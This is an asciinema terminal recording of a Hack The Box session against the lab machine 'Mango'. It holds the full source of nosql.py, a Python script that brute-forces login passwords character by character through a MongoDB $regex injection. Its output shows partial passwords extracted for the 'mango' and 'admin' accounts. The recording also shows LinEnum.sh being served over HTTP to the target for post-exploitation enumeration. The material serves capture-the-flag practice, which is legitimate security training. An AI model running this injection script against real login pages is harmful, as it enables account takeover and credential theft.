{"version": 2, "width": 187, "height": 49, "timestamp": 1587248858, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.137358, "o", "\u001b]0; ~ >> Payas0 | boxes/Mango \u0007"]
[0.161516, "o", "\r\n\u001b[J\u001b[1;31mroot\u001b[0m in \u001b[1;36mhtb/boxes/Mango\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33mv2.7.17\u001b[0m \r\n\u001b[1;32m❯\u001b[0m "]
[1.533207, "o", "p"]
[1.7971, "o", "y"]
[1.917616, "o", "t"]
[1.989327, "o", "h"]
[2.188278, "o", "o"]
[2.420909, "o", "n"]
[2.565628, "o", " "]
[2.80529, "o", "n"]
[3.045431, "o", "o"]
[3.232867, "o", "sql.py "]
[4.476719, "o", "\r\n"]
[15.594006, "o", "Found one more char : h\r\n"]
[59.508633, "o", "Found one more char : h3\r\n"]
[71.323992, "o", "Found one more char : h3m\r\n"]
[94.869915, "o", "Found one more char : h3mX\r\n"]
[136.39988, "o", "Found one more char : h3mXK\r\n"]
[171.635687, "o", "Found one more char : h3mXK8\r\n"]
[194.173143, "o", "Found one more char : h3mXK8R\r\n"]
[222.675736, "o", "Found one more char : h3mXK8Rh\r\n"]
[244.67714, "o", "Found one more char : h3mXK8RhU\r\n"]
[259.161503, "o", "Found one more char : h3mXK8RhU~\r\n"]
[271.3613, "o", "Found one more char : h3mXK8RhU~f\r\n"]
[310.437955, "o", "Found one more char : h3mXK8RhU~f{\r\n"]
[363.315757, "o", "Found one more char : h3mXK8RhU~f{]\r\n"]
[376.38533, "o", "Found one more char : h3mXK8RhU~f{]f\r\n"]
[426.547504, "o", "Found one more char : h3mXK8RhU~f{]f5\r\n"]
[454.923448, "o", "Found one more char : h3mXK8RhU~f{]f5H\r\n"]
[468.173568, "o", "Found one more char : h3mXK8RhU~f{]f5H$\r\n"]
[485.314644, "o", "^C"]
[485.316062, "o", "Traceback (most recent call last):\r\n  File \"nosql.py\", line 16, in <module>\r\n    r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)\r\n  File \"/usr/lib/python2.7/dist-packages/requests/api.py\", line 116, in post\r\n    return request('post', url, data=data, json=json, **kwargs)\r\n  File \"/usr/lib/python2.7/dist-packages/requests/api.py\", line 60, in request\r\n    return session.request(method=method, url=url, **kwargs)\r\n  File \"/usr/lib/python2.7/dist-packages/requests/sessions.py\", line 533, in request\r\n    resp = self.send(prep, **send_kwargs)\r\n  File \"/usr/lib/python2.7/dist-packages/requests/sessions.py\", line 646, in send\r\n    r = adapter.send(request, **kwargs)\r\n  File \"/usr/lib/python2.7/dist-packages/requests/adapters.py\", line 449, in send\r\n    timeout=timeout\r\n  File \"/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py\", line 672, in urlopen\r\n    chunked=chunked,\r\n  File \"/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py\", line 412, in _make_re"]
[485.31613, "o", "quest\r\n    httplib_response = conn.getresponse(buffering=True)\r\n  File \"/usr/lib/python2.7/httplib.py\", line 1148, in getresponse\r\n"]
[485.316497, "o", "    response.begin()\r\n  File \"/usr/lib/python2.7/httplib.py\", line 448, in begin\r\n    version, status, reason = self._read_status()\r\n  File \"/usr/lib/python2.7/httplib.py\", line 404, in _read_status\r\n    line = self.fp.readline(_MAXLINE + 1)\r\n  File \"/usr/lib/python2.7/socket.py\", line 480, in readline\r\n    data = self._sock.recv(self._rbufsize)\r\nKeyboardInterrupt\r\n"]
[485.340466, "o", "\u001b]0; ~ >> Payas0 | boxes/Mango \u0007"]
[485.396793, "o", "\r\n\u001b[J\u001b[1;31mroot\u001b[0m in \u001b[1;36mhtb/boxes/Mango\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33mv2.7.17\u001b[0m \u001b[1;33mtook 8m\u001b[0m \r\n\u001b[1;31m❯\u001b[0m "]
[590.830539, "o", "c"]
[591.764012, "o", ";"]
[591.867917, "o", "e"]
[592.004115, "o", "a"]
[592.124045, "o", "r"]
[592.33996, "o", "\b\u001b[K"]
[592.840652, "o", "\b\u001b[K"]
[592.891368, "o", "\b\u001b[K"]
[592.94301, "o", "\b\u001b[K"]
[592.994151, "o", "\b\u001b[K"]
[593.045351, "o", "\u0007"]
[593.094457, "o", "\u0007"]
[593.145179, "o", "\u0007"]
[593.275788, "o", "l"]
[593.388163, "o", "s"]
[593.507979, "o", "\r\n"]
[593.514906, "o", "mango  nmap-Mango  nosql.py\r\n"]
[593.521829, "o", "\u001b]0; ~ >> Payas0 | boxes/Mango \u0007"]
[593.543638, "o", "\r\n\u001b[J\u001b[1;31mroot\u001b[0m in \u001b[1;36mhtb/boxes/Mango\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33mv2.7.17\u001b[0m \r\n\u001b[1;32m❯\u001b[0m "]
[594.268641, "o", "c"]
[594.419305, "o", "l"]
[594.507026, "o", "e"]
[594.603478, "o", "a"]
[594.715163, "o", "r"]
[594.835634, "o", "\r\n"]
[594.840101, "o", "\u001b[H\u001b[2J\u001b[3J"]
[594.845836, "o", "\u001b]0; ~ >> Payas0 | boxes/Mango \u0007"]
[594.857892, "o", "\r\n\u001b[J\u001b[1;31mroot\u001b[0m in \u001b[1;36mhtb/boxes/Mango\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33mv2.7.17\u001b[0m \r\n\u001b[1;32m❯\u001b[0m "]
[595.874173, "o", "n"]
[595.971024, "o", "a"]
[596.05934, "o", "n"]
[596.266958, "o", "o"]
[596.362957, "o", " "]
[597.507742, "o", "n"]
[597.770177, "o", "o"]
[597.931812, "o", "sql.py "]
[598.274552, "o", "\r\n"]
[598.281735, "o", "\u001b[?2004h"]
[598.282106, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[1;49r\u001b(B\u001b[m\u001b[4l\u001b[?7h\u001b[39;49m\u001b[?1h\u001b=\u001b[?1h\u001b=\u001b[?25l"]
[598.282341, "o", "\u001b[39;49m\u001b(B\u001b[m\u001b[H\u001b[2J\u001b[47;87H\u001b(B\u001b[0;7m[ Reading... ]\u001b(B\u001b[m"]
[598.282477, "o", "\u001b[47;86H\u001b(B\u001b[0;7m[ Read 21 lines ]\u001b(B\u001b[m"]
[598.282981, "o", "\u001b[H\u001b(B\u001b[0;7m  GNU nano 4.8                                                                             nosql.py                                                                                        \u001b[1;186H\u001b(B\u001b[m"]
[598.283117, "o", "\r\u001b[48d\u001b(B\u001b[0;7m^G\u001b(B\u001b[m Get Help\u001b[18G\u001b(B\u001b[0;7m^O\u001b(B\u001b[m Write Out     \u001b(B\u001b[0;7m^W\u001b(B\u001b[m Where Is\u001b[52G\u001b(B\u001b[0;7m^K\u001b(B\u001b[m Cut Text\u001b[69G\u001b(B\u001b[0;7m^J\u001b(B\u001b[m Justify\u001b[86G\u001b(B\u001b[0;7m^C\u001b(B\u001b[m Cur Pos\u001b[103G\u001b(B\u001b[0;7mM-U\u001b(B\u001b[m Undo\u001b[48;120H\u001b(B\u001b[0;7mM-A\u001b(B\u001b[m Mark Text    \u001b(B\u001b[0;7mM-]\u001b(B\u001b[m To Bracket   \u001b(B\u001b[0;7mM-Q\u001b(B\u001b[m Previous     \u001b(B\u001b[0;7m^B\u001b(B\u001b[m Back\r\u001b[49d\u001b(B\u001b[0;7m^X\u001b(B\u001b[m Exit\u001b[49;18H\u001b(B\u001b[0;7m^R\u001b(B\u001b[m Read File     \u001b(B\u001b[0;7m^\\\u001b(B\u001b[m Replace\u001b[52G\u001b(B\u001b[0;7m^U\u001b(B\u001b[m Paste Text    \u001b(B\u001b[0;7m^T\u001b(B\u001b[m To Spell\u001b[86G\u001b(B\u001b[0;7m^_\u001b(B\u001b[m Go To Line    \u001b(B\u001b[0;7mM-E\u001b(B\u001b[m Redo\u001b[49;120H\u001b(B\u001b[0;7mM-6\u001b(B\u001b[m Copy Text    \u001b(B\u001b[0;7m^Q\u001b(B\u001b[m Where Was     \u001b(B\u001b[0;7mM-W\u001b(B\u001b[m Next\u001b[49;171H\u001b(B\u001b[0;7m^F\u001b(B\u001b[m Forward\r\u001b[47d"]
[598.283929, "o", "\u001b[2d\u001b(B\u001b[0;1m\u001b[36mimport\u001b[39m\u001b(B\u001b[m requests\r\u001b[3d\u001b(B\u001b[0;1m\u001b[36mimport\u001b[39m\u001b(B\u001b[m urllib3\r\u001b[4d\u001b(B\u001b[0;1m\u001b[36mimport\u001b[39m\u001b(B\u001b[m string\r\u001b[5d\u001b(B\u001b[0;1m\u001b[36mimport\u001b[39m\u001b(B\u001b[m urllib\r\u001b[6durllib3.disable_warnings()\r\u001b[8dusername=\u001b(B\u001b[0;1m\u001b[32m\"mango\"\u001b[31m #enter the username\r\u001b[9d\u001b[39m\u001b(B\u001b[mpassword=\u001b(B\u001b[0;1m\u001b[32m\"\"\r\u001b[10d\u001b[39m\u001b(B\u001b[mu=\u001b(B\u001b[0;1m\u001b[32m\"http://staging-order.mango.htb\"\u001b[31m # Enter the url here\r\u001b[11d\u001b[39m\u001b(B\u001b[mheaders={\u001b(B\u001b[0;1m\u001b[32m'content-type'\u001b[39m\u001b(B\u001b[m: \u001b(B\u001b[0;1m\u001b[32m'application/x-www-form-urlencoded'\u001b[39m\u001b(B\u001b[m, \u001b(B\u001b[0;1m\u001b[32m'staging-order.mango.htb'\u001b[39m\u001b(B\u001b[m: \u001b(B\u001b[0;1m\u001b[32m''\u001b[39m\u001b(B\u001b[m}\u001b(B\u001b[0;1m\u001b[31m # Enter the Host header here.\u001b(B\u001b[0m\u001b[42m \r\u001b[13d\u001b(B\u001b[0;1m\u001b[36mwhile\u001b[39m\u001b(B\u001b[m \u001b(B\u001b[0;1m\u001b[35mTrue\u001b[39m\u001b(B\u001b[m:\u001b[14;5H"]
[598.283958, "o", "\u001b(B\u001b[0;1m\u001b[36mfor\u001b[39m\u001b(B\u001b[m c \u001b(B\u001b[0;1m\u001b[36min\u001b[39m\u001b(B\u001b[m string.printable:\u001b[15;9H\u001b(B\u001b[0;1m\u001b[36mif\u001b[39m\u001b(B\u001b[m c \u001b(B\u001b[0;1m\u001b[36mnot\u001b[39m\u001b(B\u001b[m \u001b(B\u001b[0;1m\u001b[36min\u001b[39m\u001b(B\u001b[m [\u001b(B\u001b[0;1m\u001b[32m'*'\u001b[39m\u001b(B\u001b[m,\u001b(B\u001b[0;1m\u001b[32m'+'\u001b[39m\u001b(B\u001b[m,\u001b(B\u001b[0;1m\u001b[32m'.'\u001b[39m\u001b(B\u001b[m,\u001b(B\u001b[0;1m\u001b[32m'?'\u001b[39m\u001b(B\u001b[m,\u001b(B\u001b[0;1m\u001b[32m'|'\u001b[39m\u001b(B\u001b[m,\u001b(B\u001b[0;1m\u001b[32m'&'\u001b[39m\u001b(B\u001b[m,\u001b(B\u001b[0;1m\u001b[32m'\\\\'\u001b[39m\u001b(B\u001b[m]:\u001b[16;13Hpayload=\u001b(B\u001b[0;1m\u001b[32m'username=%s&password[$regex]=^%s.*&login=login'\u001b[39m\u001b(B\u001b[m% (username,password + c)\u001b[17;13H"]
[598.284072, "o", "r = requests.post(u, data = payload, headers = headers, verify = \u001b(B\u001b[0;1m\u001b[35mFalse\u001b[39m\u001b(B\u001b[m, allow_redirects = \u001b(B\u001b[0;1m\u001b[35mFalse\u001b[39m\u001b(B\u001b[m)\u001b[18;12H\u001b(B\u001b[0;1m\u001b[31m #print(payload)\u001b[19;12H #print(r.status_code)\u001b[20;13H\u001b[36mif\u001b[39m\u001b(B\u001b[m r.status_code == 302:\u001b[21;17Hprint(\u001b(B\u001b[0;1m\u001b[32m\"Found one more char : %s\"\u001b[39m\u001b(B\u001b[m % (password+c))\u001b[22;17Hpassword += c\r\u001b[2d\u001b[?12l\u001b[?25h"]
[598.902174, "o", "\u001b[?25l\u001b[3d\u001b[?12l\u001b[?25h"]
[599.046237, "o", "\u001b[?25l\u001b[4d\u001b[?12l\u001b[?25h"]
[599.206944, "o", "\u001b[?25l\u001b[5d\u001b[?12l\u001b[?25h"]
[599.358701, "o", "\u001b[?25l\u001b[6d\u001b[?12l\u001b[?25h"]
[599.502788, "o", "\u001b[?25l\u001b[7d\u001b[?12l\u001b[?25h"]
[599.839157, "o", "\u001b[?25l\u001b[8d\u001b[?12l\u001b[?25h"]
[600.062153, "o", "\u001b[?25lu\u001b[?12l\u001b[?25h"]
[600.562932, "o", "\u001b[?25ls\u001b[?12l\u001b[?25h"]
[600.613949, "o", "\u001b[?25l"]
[600.614311, "o", "e\u001b[?12l\u001b[?25h"]
[600.667645, "o", "\u001b[?25lr\u001b[?12l\u001b[?25h"]
[600.713688, "o", "\u001b[?25ln\u001b[?12l\u001b[?25h"]
[600.76563, "o", "\u001b[?25la\u001b[?12l\u001b[?25h"]
[600.815098, "o", "\u001b[?25lm\u001b[?12l\u001b[?25h"]
[600.866699, "o", "\u001b[?25le\u001b[?12l\u001b[?25h"]
[600.915305, "o", "\u001b[?25l=\u001b[?12l\u001b[?25h"]
[600.965699, "o", "\u001b[?25l"]
[600.965787, "o", "\u001b[C\u001b[?12l\u001b[?25h"]
[601.016045, "o", "\u001b[?25l\u001b[C\u001b[?12l\u001b[?25h"]
[601.066831, "o", "\u001b[?25l\u001b[C\u001b[?12l\u001b[?25h"]
[601.117902, "o", "\u001b[?25l\u001b[C\u001b[?12l\u001b[?25h"]
[601.168225, "o", "\u001b[?25l\u001b[C\u001b[?12l\u001b[?25h"]
[601.218528, "o", "\u001b[?25l\u001b[C\u001b[?12l\u001b[?25h"]
[601.853719, "o", "\u001b[?25l\u001b[1;178H\u001b(B\u001b[0;7mModified\u001b(B\u001b[m"]
[601.853784, "o", "\u001b[8;15H\u001b[1P\u001b[?12l\u001b[?25h"]
[602.02861, "o", "\u001b[?25l"]
[602.029001, "o", "\b\u001b[1P\u001b[?12l\u001b[?25h"]
[602.164654, "o", "\u001b[?25l"]
[602.164938, "o", "\b\u001b[1P\u001b[?12l\u001b[?25h"]
[602.293457, "o", "\u001b[?25l\b\u001b[1P\u001b[?12l\u001b[?25h"]
[602.453157, "o", "\u001b[?25l\b\u001b[1P\r\u001b[47d\u001b[K\u001b[8;11H\u001b[?12l\u001b[?25h"]
[602.805181, "o", "\u001b[?25l\u001b(B\u001b[0;1m\u001b[32ma\"\u001b[31m #enter the username\u001b[8;12H\u001b[39m\u001b(B\u001b[m\u001b[?12l\u001b[?25h"]
[602.900912, "o", "\u001b[?25l"]
[602.901228, "o", "\u001b(B\u001b[0;1m\u001b[32md\"\u001b[31m #enter the username\u001b[8;13H\u001b[39m\u001b(B\u001b[m\u001b[?12l\u001b[?25h"]
[602.997337, "o", "\u001b[?25l\u001b(B\u001b[0;1m\u001b[32mm\"\u001b[31m #enter the username\u001b[8;14H\u001b[39m\u001b(B\u001b[m\u001b[?12l\u001b[?25h"]
[603.196375, "o", "\u001b[?25l"]
[603.196491, "o", "\u001b(B\u001b[0;1m\u001b[32mi\"\u001b[31m #enter the username\u001b[8;15H\u001b[39m\u001b(B\u001b[m\u001b[?12l\u001b[?25h"]
[603.388992, "o", "\u001b[?25l\u001b(B\u001b[0;1m\u001b[32mn\"\u001b[31m #enter the username\u001b[8;16H\u001b[39m\u001b(B\u001b[m\u001b[?12l\u001b[?25h"]
[606.058482, "o", "\u001b[?25l"]
[606.058567, "o", "\r\u001b[47d\u001b(B\u001b[0;7mSave modified buffer?                                                                                                                                                                      \u001b[48;1H Y\u001b(B\u001b[m Yes\u001b[K\r\u001b[49d\u001b(B\u001b[0;7m N\u001b(B\u001b[m No  \u001b[49;17H\u001b(B\u001b[0;7m^C\u001b(B\u001b[m Cancel\u001b[K\u001b[47;23H\u001b[?12l\u001b[?25h"]
[607.221282, "o", "\u001b[?25l\r\u001b[48d\u001b(B\u001b[0;7m^G\u001b(B\u001b[m Get Help\u001b[48;47H\u001b(B\u001b[0;7mM-D\u001b(B\u001b[m DOS Format\u001b[48;93H\u001b(B\u001b[0;7mM-A\u001b(B\u001b[m Append\u001b[48;139H\u001b(B\u001b[0;7mM-B\u001b(B\u001b[m Backup File\r\u001b[49d\u001b(B\u001b[0;7m^C\u001b(B\u001b[m Cancel\u001b[17G         \u001b[49;47H\u001b(B\u001b[0;7mM-M\u001b(B\u001b[m Mac Format\u001b[49;93H\u001b(B\u001b[0;7mM-P\u001b(B\u001b[m Prepend\u001b[49;139H\u001b(B\u001b[0;7m^T\u001b(B\u001b[m To Files\r\u001b[47d"]
[607.221393, "o", "\u001b(B\u001b[0;7mFile Name to Write: nosql.py\r\u001b(B\u001b[m\u001b[47;29H\u001b[?12l\u001b[?25h"]
[607.78014, "o", "\u001b[?25l\u001b[47;86H\u001b[1K \u001b(B\u001b[0;7m[ Writing... ]\u001b(B\u001b[m\u001b[K\u001b[1;178H\u001b(B\u001b[0;7m        \u001b(B\u001b[m\u001b[47;85H\u001b(B\u001b[0;7m[ Wrote 21 lines ]\u001b(B\u001b[m\r\u001b[J\u001b[49d\u001b[?12l\u001b[?25h\u001b[49;1H\u001b[?1049l\u001b[23;0;0t\r\u001b[?1l\u001b>\u001b[?2004l"]
[607.784562, "o", "\u001b]0; ~ >> Payas0 | boxes/Mango \u0007"]
[607.800613, "o", "\r\n\u001b[J\u001b[1;31mroot\u001b[0m in \u001b[1;36mhtb/boxes/Mango\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33mv2.7.17\u001b[0m \u001b[1;33mtook 9s\u001b[0m \r\n\u001b[1;32m❯\u001b[0m "]
[608.388615, "o", "c"]
[608.490484, "o", "a"]
[608.611262, "o", "t"]
[608.843565, "o", " "]
[609.164224, "o", "n"]
[609.890553, "o", "o"]
[610.039555, "o", "sql.py "]
[610.226506, "o", "\r\n"]
[610.232529, "o", "import requests\r\nimport urllib3\r\nimport string\r\nimport urllib\r\nurllib3.disable_warnings()\r\n\r\nusername=\"admin\" #enter the username\r\npassword=\"\"\r\nu=\"http://staging-order.mango.htb\" # Enter the url here\r\nheaders={'content-type': 'application/x-www-form-urlencoded', 'staging-order.mango.htb': ''} # Enter the Host header here. \r\n\r\nwhile True:\r\n    for c in string.printable:\r\n        if c not in ['*','+','.','?','|','&','\\\\']:\r\n            payload='username=%s&password[$regex]=^%s.*&login=login'% (username,password + c)\r\n            r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)\r\n            #print(payload)\r\n            #print(r.status_code)\r\n            if r.status_code == 302:\r\n                print(\"Found one more char : %s\" % (password+c))\r\n                password += c\r\n"]
[610.237719, "o", "\u001b]0; ~ >> Payas0 | boxes/Mango \u0007"]
[610.270854, "o", "\r\n\u001b[J\u001b[1;31mroot\u001b[0m in \u001b[1;36mhtb/boxes/Mango\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33mv2.7.17\u001b[0m \r\n\u001b[1;32m❯\u001b[0m "]
[620.536002, "o", "c"]
[620.684675, "o", "l"]
[620.773298, "o", "e"]
[620.828781, "o", "a"]
[620.972856, "o", "r"]
[621.820288, "o", "\r\n"]
[621.82879, "o", "\u001b[H\u001b[2J\u001b[3J"]
[621.835728, "o", "\u001b]0; ~ >> Payas0 | boxes/Mango \u0007"]
[621.855367, "o", "\r\n\u001b[J\u001b[1;31mroot\u001b[0m in \u001b[1;36mhtb/boxes/Mango\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33mv2.7.17\u001b[0m \r\n\u001b[1;32m❯\u001b[0m "]
[623.571468, "o", "a"]
[623.971887, "o", "s"]
[624.227381, "o", "c"]
[624.498593, "o", "i"]
[625.660342, "o", "i"]
[625.907407, "o", "n"]
[626.115152, "o", "e"]
[626.299316, "o", "m"]
[626.419358, "o", "a"]
[626.595483, "o", " "]
[627.290986, "o", "r"]
[627.451538, "o", "e"]
[627.659476, "o", "c"]
[627.787616, "o", " "]
[627.979281, "o", "a"]
[628.075513, "o", "d"]
[628.218483, "o", "m"]
[628.411815, "o", "i"]
[628.651137, "o", "n"]
[629.835089, "o", "\r\n"]
[629.983697, "o", "\u001b[0;32masciinema: recording asciicast to admin\u001b[0m\r\n\u001b[0;32masciinema: press <ctrl-d> or type \"exit\" when you're done\u001b[0m\r\n"]
[630.06713, "o", "\u001b]0; ~ >> Payas0 | boxes/Mango \u0007"]
[630.085165, "o", "\r\n\u001b[J\u001b[1;31mroot\u001b[0m in \u001b[1;36mhtb/boxes/Mango\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33mv2.7.17\u001b[0m \r\n\u001b[1;32m❯\u001b[0m "]
[631.035782, "o", "p"]
[631.298919, "o", "y"]
[631.426845, "o", "t"]
[631.4993, "o", "h"]
[631.699572, "o", "o"]
[631.891695, "o", "n"]
[632.027534, "o", " "]
[632.628178, "o", "n"]
[632.835967, "o", "o"]
[633.055208, "o", "sql.py "]
[634.267681, "o", "\r\n"]
[650.647062, "o", "Found one more char : t\r\n"]
[700.938235, "o", "Found one more char : t9\r\n"]
[729.061687, "o", "Found one more char : t9K\r\n"]
[771.761333, "o", "Found one more char : t9Kc\r\n"]
[796.877571, "o", "Found one more char : t9KcS\r\n"]
[821.376723, "o", "Found one more char : t9KcS3\r\n"]
[867.227202, "o", "Found one more char : t9KcS3>\r\n"]
[915.064435, "o", "Found one more char : t9KcS3>!\r\n"]
[931.487641, "o", "Found one more char : t9KcS3>!0\r\n"]
[953.090591, "o", "Found one more char : t9KcS3>!0B\r\n"]
[972.813225, "o", "Found one more char : t9KcS3>!0B#\r\n"]
[989.929246, "o", "Found one more char : t9KcS3>!0B#2\r\n"]
[1020.210588, "o", "^C"]
[1020.211191, "o", "Traceback (most recent call last):\r\n  File \"nosql.py\", line 16, in <module>\r\n    r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)\r\n  File \"/usr/lib/python2.7/dist-packages/requests/api.py\", line 116, in post\r\n    return request('post', url, data=data, json=json, **kwargs)\r\n  File \"/usr/lib/python2.7/dist-packages/requests/api.py\", line 60, in request\r\n    return session.request(method=method, url=url, **kwargs)\r\n  File \"/usr/lib/python2.7/dist-packages/requests/sessions.py\", line 533, in request\r\n    resp = self.send(prep, **send_kwargs)\r\n  File \"/usr/lib/python2.7/dist-packages/requests/sessions.py\", line 646, in send\r\n"]
[1020.211654, "o", "    r = adapter.send(request, **kwargs)\r\n  File \"/usr/lib/python2.7/dist-packages/requests/adapters.py\", line 449, in send\r\n    timeout=timeout\r\n  File \"/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py\", line 672, in urlopen\r\n    chunked=chunked,\r\n  File \"/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py\", line 387, in _make_request\r\n    conn.request(method, url, **httplib_request_kw)\r\n  File \"/usr/lib/python2.7/httplib.py\", line 1069, in request\r\n    self._send_request(method, url, body, headers)\r\n  File \"/usr/lib/python2.7/httplib.py\", line 1109, in _send_request\r\n"]
[1020.212533, "o", "    self.endheaders(body)\r\n  File \"/usr/lib/python2.7/httplib.py\", line 1065, in endheaders\r\n    self._send_output(message_body)\r\n  File \"/usr/lib/python2.7/httplib.py\", line 892, in _send_output\r\n    self.send(msg)\r\n  File \"/usr/lib/python2.7/httplib.py\", line 854, in send\r\n    self.connect()\r\n  File \"/usr/lib/python2.7/dist-packages/urllib3/connection.py\", line 184, in connect\r\n"]
[1020.22722, "o", "    conn = self._new_conn()\r\n  File \"/usr/lib/python2.7/dist-packages/urllib3/connection.py\", line 157, in _new_conn\r\n    (self._dns_host, self.port), self.timeout, **extra_kw\r\n  File \"/usr/lib/python2.7/dist-packages/urllib3/util/connection.py\", line 74, in create_connection\r\n"]
[1020.228455, "o", "    sock.connect(sa)\r\n  File \"/usr/lib/python2.7/socket.py\", line 228, in meth\r\n    return getattr(self._sock,name)(*args)\r\nKeyboardInterrupt\r\n"]
[1020.254453, "o", "\u001b]0; ~ >> Payas0 | boxes/Mango \u0007"]
[1020.268971, "o", "\r\n\u001b[J\u001b[1;31mroot\u001b[0m in \u001b[1;36mhtb/boxes/Mango\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33mv2.7.17\u001b[0m \u001b[1;33mtook 6m25s\u001b[0m \r\n\u001b[1;31m❯\u001b[0m "]
[1021.123697, "o", "c"]
[1021.837263, "o", "l"]
[1220.794997, "o", "\b\u001b[K"]
[1221.035032, "o", "\b\u001b[K"]
[1221.169865, "o", "\u0007"]
[1221.290875, "o", "\u0007"]
[1221.79584, "o", "l"]
[1221.97188, "o", "o"]
[1222.043783, "o", "c"]
[1222.163568, "o", "a"]
[1222.275502, "o", "t"]
[1222.442573, "o", "e"]
[1222.562711, "o", " "]
[1222.842163, "o", "L"]
[1223.179141, "o", "i"]
[1224.330907, "o", "n"]
[1224.705019, "o", "E"]
[1224.818512, "o", "n"]
[1225.035001, "o", "u"]
[1225.22663, "o", "m"]
[1225.898304, "o", "\r\n"]
[1225.951424, "o", "/root/bugs/LinEnum.sh\r\n"]
[1225.957887, "o", "/root/htb/boxes/Traverxec/LinEnum.sh\r\n"]
[1226.256584, "o", "\u001b]0; ~ >> Payas0 | boxes/Mango \u0007"]
[1226.295843, "o", "\r\n\u001b[J\u001b[1;31mroot\u001b[0m in \u001b[1;36mhtb/boxes/Mango\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33mv2.7.17\u001b[0m \r\n\u001b[1;32m❯\u001b[0m "]
[1234.124272, "o", "c"]
[1234.219605, "o", "p"]
[1234.315305, "o", " "]
[1235.750902, "o", "/root/htb/boxes/Traverxec/LinEnum.sh\r\n"]
[1235.772531, "o", "cp: missing destination file operand after '/root/htb/boxes/Traverxec/LinEnum.sh'\r\nTry 'cp --help' for more information.\r\n"]
[1235.802151, "o", "\u001b]0; ~ >> Payas0 | boxes/Mango \u0007"]
[1235.887555, "o", "\r\n\u001b[J\u001b[1;31mroot\u001b[0m in \u001b[1;36mhtb/boxes/Mango\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33mv2.7.17\u001b[0m \r\n\u001b[1;31m❯\u001b[0m "]
[1236.482842, "o", "cp /root/htb/boxes/Traverxec/LinEnum.sh"]
[1236.963301, "o", " "]
[1237.651947, "o", "."]
[1238.236049, "o", "\r\n"]
[1238.285754, "o", "\u001b]0; ~ >> Payas0 | boxes/Mango \u0007"]
[1238.309618, "o", "\r\n\u001b[J\u001b[1;31mroot\u001b[0m in \u001b[1;36mhtb/boxes/Mango\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33mv2.7.17\u001b[0m \r\n\u001b[1;32m❯\u001b[0m "]
[1239.659368, "o", "p"]
[1239.91506, "o", "y"]
[1239.987535, "o", "t"]
[1240.083764, "o", "h"]
[1240.259436, "o", "o"]
[1240.441783, "o", "n"]
[1240.515397, "o", "3"]
[1240.634718, "o", " "]
[1240.763393, "o", "-"]
[1240.970826, "o", "m"]
[1241.586401, "o", " "]
[1241.858718, "o", "h"]
[1241.994571, "o", "t"]
[1242.146324, "o", "t"]
[1242.242576, "o", "p"]
[1242.46805, "o", ".,"]
[1242.514417, "o", "s"]
[1242.714516, "o", "e"]
[1243.075508, "o", "\b\u001b[K"]
[1243.236211, "o", "\b\u001b[K"]
[1243.411229, "o", "\b\u001b[K"]
[1243.634287, "o", "s"]
[1243.8266, "o", "e"]
[1244.067015, "o", "r"]
[1244.266978, "o", "v"]
[1244.47468, "o", "e"]
[1244.642529, "o", "r"]
[1244.722567, "o", " "]
[1245.07553, "o", "8"]
[1245.139571, "o", "0"]
[1245.266498, "o", "\r\n"]
[1245.375109, "o", "Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...\r\n"]
[1272.445386, "o", "10.10.10.162 - - [19/Apr/2020 06:48:51] \"GET /LinEnum.sh HTTP/1.1\" 200 -\r\n"]
[4354.329323, "o", "e"]
[4354.48731, "o", "x"]
[4355.065797, "o", "i"]
[4355.169774, "o", "t"]
[4355.305226, "o", "\r\n"]
[4356.22242, "o", "^C\r\nKeyboard interrupt received, exiting.\r\n"]
[4356.252659, "o", "\u001b]0; ~ >> Payas0 | boxes/Mango \u0007"]
[4356.263131, "o", "\r\n\u001b[J\u001b[1;31mroot\u001b[0m in \u001b[1;36mhtb/boxes/Mango\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33mv2.7.17\u001b[0m \u001b[1;33mtook 51m50s\u001b[0m \r\n\u001b[1;32m❯\u001b[0m "]
[4356.582261, "o", "e"]
[4356.802766, "o", "x"]
[4356.890669, "o", "i"]
[4357.035961, "o", "t"]
[4357.105731, "o", "\r\n"]
[4357.111475, "o", "exit\r\n"]
[4357.112833, "o", "\u001b[0;32masciinema: recording finished\u001b[0m\r\n\u001b[0;32masciinema: asciicast saved to admin\u001b[0m\r\n"]
[4357.138006, "o", "\u001b]0; ~ >> Payas0 | boxes/Mango \u0007"]
[4357.152109, "o", "\r\n\u001b[J\u001b[1;31mroot\u001b[0m in \u001b[1;36mhtb/boxes/Mango\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33mv2.7.17\u001b[0m \u001b[1;33mtook 1h2m7s\u001b[0m \r\n\u001b[1;32m❯\u001b[0m "]
[4358.352852, "o", "e"]
[4358.556355, "o", "x"]
[4358.629961, "o", "i"]
[4358.832793, "o", "t"]
[4358.873612, "o", "\r\n"]
[4358.87695, "o", "exit\r\n"]
